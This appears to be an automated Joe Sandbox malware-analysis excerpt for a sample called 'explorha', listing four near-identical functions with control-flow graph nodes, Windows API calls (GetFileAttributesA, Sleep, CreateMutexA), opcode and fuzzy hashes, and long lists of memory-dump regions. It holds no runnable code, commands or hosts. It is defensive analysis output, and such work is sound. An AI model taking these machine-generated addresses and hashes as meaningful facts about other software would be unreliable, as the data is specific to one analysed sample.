                                                                                                      • Snapshot File: hcaresult_6_2_860000_explorha.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: AttributesCreateFileMutexSleep
                                                                                                      • String ID:
                                                                                                      • API String ID: 396266464-0
                                                                                                      • Opcode ID: 3999692b9b50f0b77921b1b4bc000c210ac8b89e0dd9269fc4819b1bd8046218
                                                                                                      • Instruction ID: a6a5353527413a7a10b6d14f36797f728769acdf7f318a43270d31298ff0a3e6
                                                                                                      • Opcode Fuzzy Hash: 3999692b9b50f0b77921b1b4bc000c210ac8b89e0dd9269fc4819b1bd8046218
                                                                                                      • Instruction Fuzzy Hash: F03166727141048BEB08DBACDD88BADB7A6FB85311F24821CE454EB3C5D77699808B11
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Function 00869B49 Relevance: 4.6, APIs: 3, Instructions: 127sleepsynchronizationCOMMON
                                                                                                      Download Yara Rule

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 2997 869b49-869b69 GetFileAttributesA 3000 869b97-869bb3 2997->3000 3001 869b6b-869b77 2997->3001 3004 869bb5-869bc1 3000->3004 3005 869be1-869c00 3000->3005 3002 869b8d-869b94 call 87ecf8 3001->3002 3003 869b79-869b87 3001->3003 3002->3000 3003->3002 3008 86a400 3003->3008 3010 869bd7-869bde call 87ecf8 3004->3010 3011 869bc3-869bd1 3004->3011 3006 869c02-869c0e 3005->3006 3007 869c2e-86a3e6 call 879750 3005->3007 3013 869c24-869c2b call 87ecf8 3006->3013 3014 869c10-869c1e 3006->3014 3016 86a423-86a458 Sleep CreateMutexA 3008->3016 3017 86a400 call 8982fa 3008->3017 3010->3005 3011->3008 3011->3010 3013->3007 3014->3008 3014->3013 3025 86a45e-86a464 3016->3025 3017->3016 3027 86a466 3025->3027 3028 86a467-86a46f call 897cb9 3025->3028
                                                                                                      APIs
                                                                                                      • GetFileAttributesA.KERNELBASE(00000000), ref: 00869B4C
                                                                                                      • Sleep.KERNELBASE(000003E8), ref: 0086A435
                                                                                                      • CreateMutexA.KERNELBASE(00000000,00000000,008C51D8), ref: 0086A453
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.3038017624.0000000000861000.00000040.00000001.01000000.00000008.sdmp, Offset: 00860000, based on PE: true
                                                                                                      • Associated: 00000006.00000002.3037982747.0000000000860000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3038017624.00000000008C4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3038130354.00000000008C9000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3038166109.00000000008CB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3039114047.00000000008D7000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040343129.0000000000A26000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040381021.0000000000A28000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040422586.0000000000A3D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040422586.0000000000A48000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040509340.0000000000A64000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040550421.0000000000A66000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040600126.0000000000A79000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040627686.0000000000A7A000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040654780.0000000000A82000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040681219.0000000000A8D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040710491.0000000000AA2000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040736469.0000000000AA6000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040761508.0000000000AAE000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040785461.0000000000AB6000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040808759.0000000000AB7000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040832531.0000000000ABA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040861141.0000000000ACA000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040884854.0000000000ACB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040912755.0000000000AD8000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040938612.0000000000ADD000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040968862.0000000000ADE000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040995111.0000000000AE1000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041022194.0000000000AE2000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041051151.0000000000AEA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041080655.0000000000AFB000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041105496.0000000000AFC000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041134725.0000000000AFD000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041161637.0000000000B02000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041194878.0000000000B25000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041220294.0000000000B26000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041220294.0000000000B31000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041272872.0000000000B49000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041295271.0000000000B4B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041318626.0000000000B5F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041342143.0000000000B61000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041368250.0000000000B62000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041394752.0000000000B68000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041419159.0000000000B6A000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041449351.0000000000B77000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041477502.0000000000B79000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_860000_explorha.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: AttributesCreateFileMutexSleep
                                                                                                      • String ID:
                                                                                                      • API String ID: 396266464-0
                                                                                                      • Opcode ID: 0d6ded3709a46a3a6a85e5c537fe6f0f75fcf209df97c129dc6a1a3163f7dcb4
                                                                                                      • Instruction ID: c7da16a97a96595e9407f7114f5e961e64f1c625b47934866c9d2ca5e6c47140
                                                                                                      • Opcode Fuzzy Hash: 0d6ded3709a46a3a6a85e5c537fe6f0f75fcf209df97c129dc6a1a3163f7dcb4
                                                                                                      • Instruction Fuzzy Hash: F73146717001089BEB0CDB6CEDC9BADB7A6FBC5324F248218E454EB3D5C775A9808B55
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Function 00869C7E Relevance: 4.6, APIs: 3, Instructions: 126sleepsynchronizationCOMMON
                                                                                                      Download Yara Rule

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 3031 869c7e-869c9e GetFileAttributesA 3034 869ca0-869cac 3031->3034 3035 869ccc-869ce8 3031->3035 3038 869cc2-869cc9 call 87ecf8 3034->3038 3039 869cae-869cbc 3034->3039 3036 869d16-869d35 3035->3036 3037 869cea-869cf6 3035->3037 3042 869d37-869d43 3036->3042 3043 869d63-86a3e6 call 879750 3036->3043 3040 869d0c-869d13 call 87ecf8 3037->3040 3041 869cf8-869d06 3037->3041 3038->3035 3039->3038 3044 86a405 3039->3044 3040->3036 3041->3040 3041->3044 3047 869d45-869d53 3042->3047 3048 869d59-869d60 call 87ecf8 3042->3048 3050 86a423-86a458 Sleep CreateMutexA 3044->3050 3051 86a405 call 8982fa 3044->3051 3047->3044 3047->3048 3048->3043 3059 86a45e-86a464 3050->3059 3051->3050 3061 86a466 3059->3061 3062 86a467-86a46f call 897cb9 3059->3062
                                                                                                      APIs
                                                                                                      • GetFileAttributesA.KERNELBASE(00000000), ref: 00869C81
                                                                                                      • Sleep.KERNELBASE(000003E8), ref: 0086A435
                                                                                                      • CreateMutexA.KERNELBASE(00000000,00000000,008C51D8), ref: 0086A453
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.3038017624.0000000000861000.00000040.00000001.01000000.00000008.sdmp, Offset: 00860000, based on PE: true
                                                                                                      • Associated: 00000006.00000002.3037982747.0000000000860000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3038017624.00000000008C4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3038130354.00000000008C9000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3038166109.00000000008CB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3039114047.00000000008D7000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040343129.0000000000A26000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040381021.0000000000A28000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040422586.0000000000A3D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040422586.0000000000A48000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040509340.0000000000A64000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040550421.0000000000A66000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040600126.0000000000A79000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040627686.0000000000A7A000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040654780.0000000000A82000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040681219.0000000000A8D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040710491.0000000000AA2000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040736469.0000000000AA6000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040761508.0000000000AAE000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040785461.0000000000AB6000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040808759.0000000000AB7000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040832531.0000000000ABA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040861141.0000000000ACA000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040884854.0000000000ACB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040912755.0000000000AD8000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040938612.0000000000ADD000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040968862.0000000000ADE000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040995111.0000000000AE1000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041022194.0000000000AE2000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041051151.0000000000AEA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041080655.0000000000AFB000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041105496.0000000000AFC000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041134725.0000000000AFD000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041161637.0000000000B02000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041194878.0000000000B25000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041220294.0000000000B26000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041220294.0000000000B31000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041272872.0000000000B49000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041295271.0000000000B4B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041318626.0000000000B5F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041342143.0000000000B61000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041368250.0000000000B62000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041394752.0000000000B68000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041419159.0000000000B6A000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041449351.0000000000B77000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041477502.0000000000B79000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_860000_explorha.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: AttributesCreateFileMutexSleep
                                                                                                      • String ID:
                                                                                                      • API String ID: 396266464-0
                                                                                                      • Opcode ID: 0b3a3769c3d64b9b1f53bbad06a892a2637b99fdf839046a111c11bbd33cc91e
                                                                                                      • Instruction ID: ac0dabdc4792f778274ab7a9904f6b7920bc99fe2f8a51e5d584976710e8110b
                                                                                                      • Opcode Fuzzy Hash: 0b3a3769c3d64b9b1f53bbad06a892a2637b99fdf839046a111c11bbd33cc91e
                                                                                                      • Instruction Fuzzy Hash: 153144727001048BEF08DB7CDD88BADBBA6FB85314F208228E454EB3D5D77599808B12
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Function 00869DB3 Relevance: 4.6, APIs: 3, Instructions: 125sleepsynchronizationCOMMON
                                                                                                      Download Yara Rule

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 3065 869db3-869dd3 GetFileAttributesA 3068 869dd5-869de1 3065->3068 3069 869e01-869e1d 3065->3069 3070 869df7-869dfe call 87ecf8 3068->3070 3071 869de3-869df1 3068->3071 3072 869e1f-869e2b 3069->3072 3073 869e4b-869e6a 3069->3073 3070->3069 3071->3070 3076 86a40a 3071->3076 3078 869e41-869e48 call 87ecf8 3072->3078 3079 869e2d-869e3b 3072->3079 3074 869e6c-869e78 3073->3074 3075 869e98-86a3e6 call 879750 3073->3075 3081 869e8e-869e95 call 87ecf8 3074->3081 3082 869e7a-869e88 3074->3082 3084 86a423-86a458 Sleep CreateMutexA 3076->3084 3085 86a40a call 8982fa 3076->3085 3078->3073 3079->3076 3079->3078 3081->3075 3082->3076 3082->3081 3093 86a45e-86a464 3084->3093 3085->3084 3095 86a466 3093->3095 3096 86a467-86a46f call 897cb9 3093->3096
                                                                                                      APIs
                                                                                                      • GetFileAttributesA.KERNELBASE(00000000), ref: 00869DB6
                                                                                                      • Sleep.KERNELBASE(000003E8), ref: 0086A435
                                                                                                      • CreateMutexA.KERNELBASE(00000000,00000000,008C51D8), ref: 0086A453
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.3038017624.0000000000861000.00000040.00000001.01000000.00000008.sdmp, Offset: 00860000, based on PE: true
                                                                                                      • Associated: 00000006.00000002.3037982747.0000000000860000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3038017624.00000000008C4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3038130354.00000000008C9000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3038166109.00000000008CB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3039114047.00000000008D7000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040343129.0000000000A26000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040381021.0000000000A28000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040422586.0000000000A3D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040422586.0000000000A48000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040509340.0000000000A64000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040550421.0000000000A66000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040600126.0000000000A79000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040627686.0000000000A7A000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040654780.0000000000A82000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040681219.0000000000A8D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040710491.0000000000AA2000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040736469.0000000000AA6000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040761508.0000000000AAE000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040785461.0000000000AB6000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040808759.0000000000AB7000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040832531.0000000000ABA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040861141.0000000000ACA000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040884854.0000000000ACB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040912755.0000000000AD8000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040938612.0000000000ADD000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040968862.0000000000ADE000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040995111.0000000000AE1000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041022194.0000000000AE2000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041051151.0000000000AEA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041080655.0000000000AFB000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041105496.0000000000AFC000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041134725.0000000000AFD000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041161637.0000000000B02000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041194878.0000000000B25000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041220294.0000000000B26000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041220294.0000000000B31000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041272872.0000000000B49000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041295271.0000000000B4B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041318626.0000000000B5F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041342143.0000000000B61000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041368250.0000000000B62000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041394752.0000000000B68000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041419159.0000000000B6A000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041449351.0000000000B77000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041477502.0000000000B79000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_860000_explorha.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: AttributesCreateFileMutexSleep
                                                                                                      • String ID:
                                                                                                      • API String ID: 396266464-0
                                                                                                      • Opcode ID: a328794e78827ec6e0fad08a658902d1e2acef1e59fb35692f073c53dcdbebae
                                                                                                      • Instruction ID: d006cee13fb5ec7b82742ce70921607bd56ba99b71e8bbd9098ff298bc933fc7
                                                                                                      • Opcode Fuzzy Hash: a328794e78827ec6e0fad08a658902d1e2acef1e59fb35692f073c53dcdbebae
                                                                                                      • Instruction Fuzzy Hash: B5314472A001449BEB18DB6CCDC8BADB766FF85314F24822CE455EB3D5C7B699808B11
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Function 00869EE8 Relevance: 4.6, APIs: 3, Instructions: 124sleepsynchronizationCOMMON
                                                                                                      Download Yara Rule

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 3099 869ee8-869f08 GetFileAttributesA 3102 869f36-869f52 3099->3102 3103 869f0a-869f16 3099->3103 3106 869f54-869f60 3102->3106 3107 869f80-869f9f 3102->3107 3104 869f2c-869f33 call 87ecf8 3103->3104 3105 869f18-869f26 3103->3105 3104->3102 3105->3104 3108 86a40f 3105->3108 3110 869f76-869f7d call 87ecf8 3106->3110 3111 869f62-869f70 3106->3111 3112 869fa1-869fad 3107->3112 3113 869fcd-86a3e6 call 879750 3107->3113 3115 86a414-86a458 call 8982fa * 3 Sleep CreateMutexA 3108->3115 3116 86a40f call 8982fa 3108->3116 3110->3107 3111->3108 3111->3110 3119 869fc3-869fca call 87ecf8 3112->3119 3120 869faf-869fbd 3112->3120 3134 86a45e-86a464 3115->3134 3116->3115 3119->3113 3120->3108 3120->3119 3135 86a466 3134->3135 3136 86a467-86a46f call 897cb9 3134->3136
                                                                                                      APIs
                                                                                                      • GetFileAttributesA.KERNELBASE(00000000), ref: 00869EEB
                                                                                                      • Sleep.KERNELBASE(000003E8), ref: 0086A435
                                                                                                      • CreateMutexA.KERNELBASE(00000000,00000000,008C51D8), ref: 0086A453
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.3038017624.0000000000861000.00000040.00000001.01000000.00000008.sdmp, Offset: 00860000, based on PE: true
                                                                                                      • Associated: 00000006.00000002.3037982747.0000000000860000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3038017624.00000000008C4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3038130354.00000000008C9000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3038166109.00000000008CB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3039114047.00000000008D7000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040343129.0000000000A26000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040381021.0000000000A28000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040422586.0000000000A3D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040422586.0000000000A48000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040509340.0000000000A64000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040550421.0000000000A66000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040600126.0000000000A79000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040627686.0000000000A7A000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040654780.0000000000A82000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040681219.0000000000A8D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040710491.0000000000AA2000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040736469.0000000000AA6000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040761508.0000000000AAE000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040785461.0000000000AB6000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040808759.0000000000AB7000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040832531.0000000000ABA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040861141.0000000000ACA000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040884854.0000000000ACB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040912755.0000000000AD8000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040938612.0000000000ADD000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040968862.0000000000ADE000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040995111.0000000000AE1000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041022194.0000000000AE2000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041051151.0000000000AEA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041080655.0000000000AFB000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041105496.0000000000AFC000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041134725.0000000000AFD000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041161637.0000000000B02000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041194878.0000000000B25000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041220294.0000000000B26000.00000040.00000001.01000000.00000008.sdmpDownload File
